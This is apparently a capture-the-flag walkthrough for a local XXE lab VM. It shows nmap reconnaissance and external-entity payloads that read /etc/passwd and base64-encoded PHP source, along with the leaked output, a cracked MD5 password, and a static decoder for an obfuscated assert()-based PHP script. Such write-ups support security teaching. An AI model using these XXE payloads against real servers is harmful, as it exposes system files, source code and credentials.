1. Deploying the lab
XXE lab download: https://pan.baidu.com/s/1xm5uVj5PlXfp7CmO6-KVow (extraction code: ai8p)
Lab VM: network adapter set to NAT mode
Kali VM: network adapter set to NAT mode
This puts the lab and Kali on the same subnet, which the host discovery below relies on.
2. Information gathering
Because Kali and the lab share a subnet, we can enumerate the live hosts on it (arp-scan needs raw-socket privileges, so run it as root):
arp-scan -l
Then scan the discovered host, 192.168.109.143, with nmap (-A enables version detection, OS detection and the default NSE scripts):
nmap -A 192.168.109.143
The scan shows port 80 open and served by Apache; the default http-robots.txt script also lists the paths that robots.txt asks crawlers to stay away from.
Open robots.txt in the browser to confirm.
Then browse to the xxe directory it reveals.
The page is a login form; that is the input we test for XXE.
3. Testing for XXE
1) Intercept the login request with Burp Suite
Submit username admin and password 123 and capture the request in Burp. The request body is an XML document (a <root> element carrying <name> and <password>), which is exactly the shape of the payloads below: we replace that body with a document that declares an external entity.
2) Construct the payload
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE aa [ <!ENTITY bb SYSTEM "file:///etc/passwd"> ]>
<root><name>&bb;</name><password>123</password></root>
The parser resolves the external entity &bb; while expanding the document, and the contents of /etc/passwd come back in the response. This confirms that external entities are enabled, i.e. the endpoint is vulnerable to XXE.
3) Read admin.php
A plain file:// read of PHP source does not work here: the <?php tag makes the expanded entity ill-formed XML, so the parser rejects the document. Wrapping the path in php://filter with convert.base64-encode returns the source as a single base64 token instead:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE aa [ <!ENTITY bb SYSTEM "php://filter/read=convert.base64-encode/resource=admin.php"> ]>
<root><name>&bb;</name><password>123</password></root>
PD9waHAKICAgc2Vzc2lvbl9zdGFydCgpOwo/PgoKCjxodG1sIGxhbmcgPSAiZW4iPgogICAKICAgPGhlYWQ+CiAgICAgIDx0aXRsZT5hZG1pbjwvdGl0bGU+CiAgICAgIDxsaW5rIGhyZWYgPSAiY3NzL2Jvb3RzdHJhcC5taW4uY3NzIiByZWwgPSAic3R5bGVzaGVldCI+CiAgICAgIAogICAgICA8c3R5bGU+CiAgICAgICAgIGJvZHkgewogICAgICAgICAgICBwYWRkaW5nLXRvcDogNDBweDsKICAgICAgICAgICAgcGFkZGluZy1ib3R0b206IDQwcHg7CiAgICAgICAgICAgIGJhY2tncm91bmQtY29sb3I6ICNBREFCQUI7CiAgICAgICAgIH0KICAgICAgICAgCiAgICAgICAgIC5mb3JtLXNpZ25pbiB7CiAgICAgICAgICAgIG1heC13aWR0aDogMzMwcHg7CiAgICAgICAgICAgIHBhZGRpbmc6IDE1cHg7CiAgICAgICAgICAgIG1hcmdpbjogMCBhdXRvOwogICAgICAgICAgICBjb2xvcjogIzAxNzU3MjsKICAgICAgICAgfQogICAgICAgICAKICAgICAgICAgLmZvcm0tc2lnbmluIC5mb3JtLXNpZ25pbi1oZWFkaW5nLAogICAgICAgICAuZm9ybS1zaWduaW4gLmNoZWNrYm94IHsKICAgICAgICAgICAgbWFyZ2luLWJvdHRvbTogMTBweDsKICAgICAgICAgfQogICAgICAgICAKICAgICAgICAgLmZvcm0tc2lnbmluIC5jaGVja2JveCB7CiAgICAgICAgICAgIGZvbnQtd2VpZ2h0OiBub3JtYWw7CiAgICAgICAgIH0KICAgICAgICAgCiAgICAgICAgIC5mb3JtLXNpZ25pbiAuZm9ybS1jb250cm9sIHsKICAgICAgICAgICAgcG9zaXRpb246IHJlbGF0aXZlOwogICAgICAgICAgICBoZWlnaHQ6IGF1dG87CiAgICAgICAgICAgIC13ZWJraXQtYm94LXNpemluZzogYm9yZGVyLWJveDsKICAgICAgICAgICAgLW1vei1ib3gtc2l6aW5nOiBib3JkZXItYm94OwogICAgICAgICAgICBib3gtc2l6aW5nOiBib3JkZXItYm94OwogICAgICAgICAgICBwYWRkaW5nOiAxMHB4OwogICAgICAgICAgICBmb250LXNpemU6IDE2cHg7CiAgICAgICAgIH0KICAgICAgICAgCiAgICAgICAgIC5mb3JtLXNpZ25pbiAuZm9ybS1jb250cm9sOmZvY3VzIHsKICAgICAgICAgICAgei1pbmRleDogMjsKICAgICAgICAgfQogICAgICAgICAKICAgICAgICAgLmZvcm0tc2lnbmluIGlucHV0W3R5cGU9ImVtYWlsIl0gewogICAgICAgICAgICBtYXJnaW4tYm90dG9tOiAtMXB4OwogICAgICAgICAgICBib3JkZXItYm90dG9tLXJpZ2h0LXJhZGl1czogMDsKICAgICAgICAgICAgYm9yZGVyLWJvdHRvbS1sZWZ0LXJhZGl1czogMDsKICAgICAgICAgICAgYm9yZGVyLWNvbG9yOiMwMTc1NzI7CiAgICAgICAgIH0KICAgICAgICAgCiAgICAgICAgIC5mb3JtLXNpZ25pbiBpbnB1dFt0eXBlPSJwYXNzd29yZCJdIHsKICAgICAgICAgICAgbWFyZ2luLWJvdHRvbTogMTBweDsKICAgICAgICAgICAgYm9yZGVyLXRvcC1sZWZ0LXJhZGl1czogMDsKICAgICAgICAgICAgYm9yZGVyLXRvcC1yaWdodC1yYWRpdXM6IDA7CiAgICAgICAgICAgIGJvcmRlci1jb2xvcjojMDE3NTcyOwogICAgICAgICB9CiAg
ICAgICAgIAogICAgICAgICBoMnsKICAgICAgICAgICAgdGV4dC1hbGlnbjogY2VudGVyOwogICAgICAgICAgICBjb2xvcjogIzAxNzU3MjsKICAgICAgICAgfQogICAgICA8L3N0eWxlPgogICAgICAKICAgPC9oZWFkPgoJCiAgIDxib2R5PgogICAgICAKICAgICAgPGgyPkVudGVyIFVzZXJuYW1lIGFuZCBQYXNzd29yZDwvaDI+IAogICAgICA8ZGl2IGNsYXNzID0gImNvbnRhaW5lciBmb3JtLXNpZ25pbiI+CiAgICAgICAgIAogICAgICAgICA8P3BocAogICAgICAgICAgICAkbXNnID0gJyc7CiAgICAgICAgICAgIGlmIChpc3NldCgkX1BPU1RbJ2xvZ2luJ10pICYmICFlbXB0eSgkX1BPU1RbJ3VzZXJuYW1lJ10pIAogICAgICAgICAgICAgICAmJiAhZW1wdHkoJF9QT1NUWydwYXNzd29yZCddKSkgewoJCQkJCiAgICAgICAgICAgICAgIGlmICgkX1BPU1RbJ3VzZXJuYW1lJ10gPT0gJ2FkbWluaXN0aGViZXN0JyAmJiAKICAgICAgICAgICAgICAgICAgbWQ1KCRfUE9TVFsncGFzc3dvcmQnXSkgPT0gJ2U2ZTA2MTgzODg1NmJmNDdlMWRlNzMwNzE5ZmIyNjA5JykgewogICAgICAgICAgICAgICAgICAkX1NFU1NJT05bJ3ZhbGlkJ10gPSB0cnVlOwogICAgICAgICAgICAgICAgICAkX1NFU1NJT05bJ3RpbWVvdXQnXSA9IHRpbWUoKTsKICAgICAgICAgICAgICAgICAgJF9TRVNTSU9OWyd1c2VybmFtZSddID0gJ2FkbWluaXN0aGViZXN0JzsKICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICBlY2hvICJZb3UgaGF2ZSBlbnRlcmVkIHZhbGlkIHVzZSBuYW1lIGFuZCBwYXNzd29yZCA8YnIgLz4iOwoJCSRmbGFnID0gIkhlcmUgaXMgdGhlIDxhIHN0eWxlPSdjb2xvcjpGRjAwMDA7JyBocmVmPScvZmxhZ21lb3V0LnBocCc+RmxhZzwvYT4iOwoJCWVjaG8gJGZsYWc7CiAgICAgICAgICAgICAgIH1lbHNlIHsKICAgICAgICAgICAgICAgICAgJG1zZyA9ICdNYXliZSBMYXRlcic7CiAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgfQogICAgICAgICA/PgogICAgICA8L2Rpdj4gPCEtLSBXMDB0L1cwMHQgLS0+CiAgICAgIAogICAgICA8ZGl2IGNsYXNzID0gImNvbnRhaW5lciI+CiAgICAgIAogICAgICAgICA8Zm9ybSBjbGFzcyA9ICJmb3JtLXNpZ25pbiIgcm9sZSA9ICJmb3JtIiAKICAgICAgICAgICAgYWN0aW9uID0gIjw/cGhwIGVjaG8gaHRtbHNwZWNpYWxjaGFycygkX1NFUlZFUlsnUEhQX1NFTEYnXSk7IAogICAgICAgICAgICA/PiIgbWV0aG9kID0gInBvc3QiPgogICAgICAgICAgICA8aDQgY2xhc3MgPSAiZm9ybS1zaWduaW4taGVhZGluZyI+PD9waHAgZWNobyAkbXNnOyA/PjwvaDQ+CiAgICAgICAgICAgIDxpbnB1dCB0eXBlID0gInRleHQiIGNsYXNzID0gImZvcm0tY29udHJvbCIgCiAgICAgICAgICAgICAgIG5hbWUgPSAidXNlcm5hbWUiIAogICAgICAgICAgICAgICByZXF1aXJlZCBhdXRvZm9jdXM+PC9icj4KICAgICAgICAgICAgPGlucHV0IHR5cGUgPSAicGFzc3dvcmQiIGNsYXNzID0gImZvcm0tY29udHJvbCIKICAg
ICAgICAgICAgICAgbmFtZSA9ICJwYXNzd29yZCIgcmVxdWlyZWQ+CiAgICAgICAgICAgIDxidXR0b24gY2xhc3MgPSAiYnRuIGJ0bi1sZyBidG4tcHJpbWFyeSBidG4tYmxvY2siIHR5cGUgPSAic3VibWl0IiAKICAgICAgICAgICAgICAgbmFtZSA9ICJsb2dpbiI+TG9naW48L2J1dHRvbj4KICAgICAgICAgPC9mb3JtPgoJCQkKICAgICAgICAgQ2xpY2sgaGVyZSB0byBjbGVhbiA8YSBocmVmID0gImFkbWlubG9nLnBocCIgdGl0ZSA9ICJMb2dvdXQiPlNlc3Npb24uCiAgICAgICAgIAogICAgICA8L2Rpdj4gCiAgICAgIAogICA8L2JvZHk+CjwvaHRtbD4K
Base64-decode the returned data:
<?php
   session_start();
?>

<html lang = "en">
   <head>
      <title>admin</title>
      <link href = "css/bootstrap.min.css" rel = "stylesheet">
      <style>
         body {
            padding-top: 40px;
            padding-bottom: 40px;
            background-color: #ADABAB;
         }
         .form-signin {
            max-width: 330px;
            padding: 15px;
            margin: 0 auto;
            color: #017572;
         }
         .form-signin .form-signin-heading,
         .form-signin .checkbox {
            margin-bottom: 10px;
         }
         .form-signin .checkbox {
            font-weight: normal;
         }
         .form-signin .form-control {
            position: relative;
            height: auto;
            -webkit-box-sizing: border-box;
            -moz-box-sizing: border-box;
            box-sizing: border-box;
            padding: 10px;
            font-size: 16px;
         }
         .form-signin .form-control:focus {
            z-index: 2;
         }
         .form-signin input[type="email"] {
            margin-bottom: -1px;
            border-bottom-right-radius: 0;
            border-bottom-left-radius: 0;
            border-color:#017572;
         }
         .form-signin input[type="password"] {
            margin-bottom: 10px;
            border-top-left-radius: 0;
            border-top-right-radius: 0;
            border-color:#017572;
         }
         h2{
            text-align: center;
            color: #017572;
         }
      </style>
   </head>
   <body>
      <h2>Enter Username and Password</h2>
      <div class = "container form-signin">
         <?php
            $msg = '';
            if (isset($_POST['login']) && !empty($_POST['username'])
               && !empty($_POST['password'])) {
               if ($_POST['username'] == 'administhebest' &&
                  md5($_POST['password']) == 'e6e061838856bf47e1de730719fb2609') {
                  $_SESSION['valid'] = true;
                  $_SESSION['timeout'] = time();
                  $_SESSION['username'] = 'administhebest';
                  echo "You have entered valid use name and password <br />";
                  $flag = "Here is the <a style='color:FF0000;' href='/flagmeout.php'>Flag</a>";
                  echo $flag;
               }else {
                  $msg = 'Maybe Later';
               }
            }
         ?>
      </div> <!-- W00t/W00t -->
      <div class = "container">
         <form class = "form-signin" role = "form"
            action = "<?php echo htmlspecialchars($_SERVER['PHP_SELF']);
            ?>" method = "post">
            <h4 class = "form-signin-heading"><?php echo $msg; ?></h4>
            <input type = "text" class = "form-control"
               name = "username"
               required autofocus></br>
            <input type = "password" class = "form-control"
               name = "password" required>
            <button class = "btn btn-lg btn-primary btn-block" type = "submit"
               name = "login">Login</button>
         </form>
         Click here to clean <a href = "adminlog.php" tite = "Logout">Session.
      </div>
   </body>
</html>
Reviewing the source shows two things.
The login accepts the username administhebest and compares the MD5 of the submitted password with e6e061838856bf47e1de730719fb2609. MD5 is a hash, not encryption, so it cannot be "decrypted", but an unsalted MD5 of a weak password is trivial to look up or brute-force; the hash resolves to admin@123.
The success branch also leaks where the flag lives: the link points to /flagmeout.php.
4) Read flagmeout.php
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE aa [ <!ENTITY bb SYSTEM "php://filter/read=convert.base64-encode/resource=flagmeout.php"> ]>
<root><name>&bb;</name><password>123</password></root>
PD9waHAKJGZsYWcgPSAiPCEtLSB0aGUgZmxhZyBpbiAoSlFaRk1NQ1pQRTRIS1dUTlBCVUZVNkpWTzVRVVFRSjUpIC0tPiI7CmVjaG8gJGZsYWc7Cj8+Cg==
Base64-decoding gives:
<?php
$flag = "<!-- the flag in (JQZFMMCZPE4HKWTNPBUFU6JVO5QUQQJ5) -->";
echo $flag;
?>
The string JQZFMMCZPE4HKWTNPBUFU6JVO5QUQQJ5 uses only A-Z and 2-7, the base32 alphabet. Base32-decoding it yields L2V0Yy8uZmxhZy5waHA=, which in turn base64-decodes to:
/etc/.flag.php
5) Read /etc/.flag.php
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE aa [ <!ENTITY bb SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/.flag.php"> ]>
<root><name>&bb;</name><password>123</password></root>
Base64-decoding the returned data gives:
$_[]++;$_[]=$_._;$_____=$_[(++$__[])][(++$__[])+(++$__[])+(++$__[])];$_=$_[$_[+_]];$___=$__=$_[++$__[]];$____=$_=$_[+_];$_++;$_++;$_++;$_=$____.++$___.$___.++$_.$__.++$___;$__=$_;$_=$_____;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$___=+_;$___.=$__;$___=++$_^$___[+_];$À=+_;$Á=$Â=$Ã=$Ä=$Æ=$È=$É=$Ê=$Ë=++$Á[];$Â++;$Ã++;$Ã++;$Ä++;$Ä++;$Ä++;$Æ++;$Æ++;$Æ++;$Æ++;$È++;$È++;$È++;$È++;$È++;$É++;$É++;$É++;$É++;$É++;$É++;$Ê++;$Ê++;$Ê++;$Ê++;$Ê++;$Ê++;$Ê++;$Ë++;$Ë++;$Ë++;$Ë++;$Ë++;$Ë++;$Ë++;$__('$_="'.$___.$Á.$Â.$Ã.$___.$Á.$À.$Á.$___.$Á.$À.$È.$___.$Á.$À.$Ã.$___.$Á.$Â.$Ã.$___.$Á.$Â.$À.$___.$Á.$É.$Ã.$___.$Á.$É.$À.$___.$Á.$É.$À.$___.$Á.$Ä.$Æ.$___.$Á.$Ã.$É.$___.$Á.$Æ.$Á.$___.$Á.$È.$Ã.$___.$Á.$Ã.$É.$___.$Á.$È.$Ã.$___.$Á.$Æ.$É.$___.$Á.$Ã.$É.$___.$Á.$Ä.$Æ.$___.$Á.$Ä.$Á.$___.$Á.$È.$Ã.$___.$Á.$É.$Á.$___.$Á.$É.$Æ.'"');$__($_);
This is heavily obfuscated PHP. Rather than untangle it by hand, we can let a PHP interpreter run it for us. Do this only in a disposable VM or container: it is untrusted code taken from the target, and it ends in a dynamic call, $__($_), whose function name and argument are both built at runtime.
6) Deploy the code on a local PHP install
7) Browse to the local copy, which prints the flag
flag: SAFCSP{xxe_is_so_easy}
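Steps 6) and 7) execute the recovered script, which is worth understanding before doing so. Its prologue uses PHP's string increment on "Array_" to spell "AssErt", so both $__('$_="..."') and $__($_) are calls to assert(), which on PHP 5 and 7 evaluates a string argument as code (PHP 8 removed that behaviour); the file is effectively an eval() of attacker-chosen data. The string it assembles is only a sequence of "\ddd" octal escapes, so the flag can be recovered statically. The decoder below is an added example, not code from the write-up; it takes the one-liner shown in step 5 as constructed input, recovers each counter variable's value from its increments, and turns the $___.$d.$d.$d groups into characters. It reads the value of $___ (a backslash, from 'l' ^ '0') off the prologue rather than emulating PHP.

```python
import re
from collections import Counter

# Constructed input: the obfuscated one-liner recovered from /etc/.flag.php above.
OBFUSCATED = r"""$_[]++;$_[]=$_._;$_____=$_[(++$__[])][(++$__[])+(++$__[])+(++$__[])];$_=$_[$_[+_]];$___=$__=$_[++$__[]];$____=$_=$_[+_];$_++;$_++;$_++;$_=$____.++$___.$___.++$_.$__.++$___;$__=$_;$_=$_____;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$___=+_;$___.=$__;$___=++$_^$___[+_];$À=+_;$Á=$Â=$Ã=$Ä=$Æ=$È=$É=$Ê=$Ë=++$Á[];$Â++;$Ã++;$Ã++;$Ä++;$Ä++;$Ä++;$Æ++;$Æ++;$Æ++;$Æ++;$È++;$È++;$È++;$È++;$È++;$É++;$É++;$É++;$É++;$É++;$É++;$Ê++;$Ê++;$Ê++;$Ê++;$Ê++;$Ê++;$Ê++;$Ë++;$Ë++;$Ë++;$Ë++;$Ë++;$Ë++;$Ë++;$__('$_="'.$___.$Á.$Â.$Ã.$___.$Á.$À.$Á.$___.$Á.$À.$È.$___.$Á.$À.$Ã.$___.$Á.$Â.$Ã.$___.$Á.$Â.$À.$___.$Á.$É.$Ã.$___.$Á.$É.$À.$___.$Á.$É.$À.$___.$Á.$Ä.$Æ.$___.$Á.$Ã.$É.$___.$Á.$Æ.$Á.$___.$Á.$È.$Ã.$___.$Á.$Ã.$É.$___.$Á.$È.$Ã.$___.$Á.$Æ.$É.$___.$Á.$Ã.$É.$___.$Á.$Ä.$Æ.$___.$Á.$Ä.$Á.$___.$Á.$È.$Ã.$___.$Á.$É.$Á.$___.$Á.$É.$Æ.'"');$__($_);"""

# A PHP variable name here is everything from '$' up to the next operator. Matching
# it this way (instead of \w) also copes with the accented names the script uses.
NAME = r"[^$.=+\[\]();'\"\s]+"

# From the prologue: $___ = ++$_ ^ $___[+_] is 'l' ^ '0' = chr(0x5c), a backslash.
# Each flag character is then emitted as $___ . $d1 . $d2 . $d3, i.e. a "\ddd"
# octal escape inside a double-quoted PHP string. That is taken as given here.
ESCAPE_VAR = "___"


def counter_values(code):
    """Recover the integer each counter variable holds when the string is built.

    $X=+_;                -> 0  (+_ is +"_", which PHP 7 coerces to 0)
    $A=$B=...=++$A[];     -> 1  (pre-increment of a fresh null array slot)
    every later "$X++;"   -> +1
    """
    values = {name: 0 for name in re.findall(rf"\$({NAME})=\+_;", code)}
    chain = re.search(rf"((?:\${NAME}=)+)\+\+\${NAME}\[\];", code)
    if chain:
        values.update({name: 1 for name in re.findall(rf"\$({NAME})=", chain.group(1))})
    for name, count in Counter(re.findall(rf"\$({NAME})\+\+;", code)).items():
        if name in values:
            values[name] += count
    return values


def decode_flag(code):
    """Rebuild the string the script hands to assert(), without running any PHP."""
    values = counter_values(code)
    body = re.search(r"\$__\('\$_=\"'\.(.*?)\.'\"'\);", code).group(1)
    tokens = [t.lstrip("$") for t in body.split(".")]
    if len(tokens) % 4:
        raise ValueError("expected groups of escape + three octal digits")
    chars = []
    for i in range(0, len(tokens), 4):
        esc, *digits = tokens[i:i + 4]
        if esc != ESCAPE_VAR:
            raise ValueError(f"token {i}: expected ${ESCAPE_VAR}, got ${esc}")
        chars.append(chr(int("".join(str(values[d]) for d in digits), 8)))
    return "".join(chars)


if __name__ == "__main__":
    print(decode_flag(OBFUSCATED))
```

The same approach works for other samples of this "non-alphanumeric PHP" family as long as they build their payload from a backslash plus counter variables; anything that instead concatenates characters produced by string increment needs the prologue emulated, which is where running it in a sandboxed PHP 7 (assert() still evaluates strings there) becomes the pragmatic choice.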